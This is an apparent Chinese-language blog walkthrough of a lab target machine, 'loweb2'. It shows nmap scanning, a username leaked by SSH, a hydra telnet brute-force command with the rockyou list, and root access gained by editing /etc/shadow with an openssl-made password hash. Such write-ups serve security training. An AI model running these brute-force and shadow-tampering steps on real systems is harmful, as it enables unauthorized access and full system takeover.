靶机loweb2

image-20250401201755980

扫出192.168.177.130

同时nmap扫描192.168.177.130

image-20250401201846983

image-20250401202028493

有80端口,dirsearch扫描,没有任何东西。

image-20250401201856920

尝试ssh连接

image-20250401202121427

得到用户名 b.taylor

使用hydra爆破
hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt telnet://192.168.177.130 -V -I

image-20250401202337964

得到密码rockyou,登录

image-20250401202538268

shadow提权
发现这个用户附加了shadow组

image-20250401202712280

nano /etc/shadow
nano编辑器:Ctrl+O保存 Ctrl+X退出
 openssl生成加密
    openssl passwd 123456
    $1$tZiMNfo/$v/H7.CkEWtmWZ5VEUUL2D0

image-20250401202917332

image-20250401203005985

image-20250401203043974

posted @ 2025-04-08 18:04  冷鸢fleurs  阅读(13)  评论(0)    收藏  举报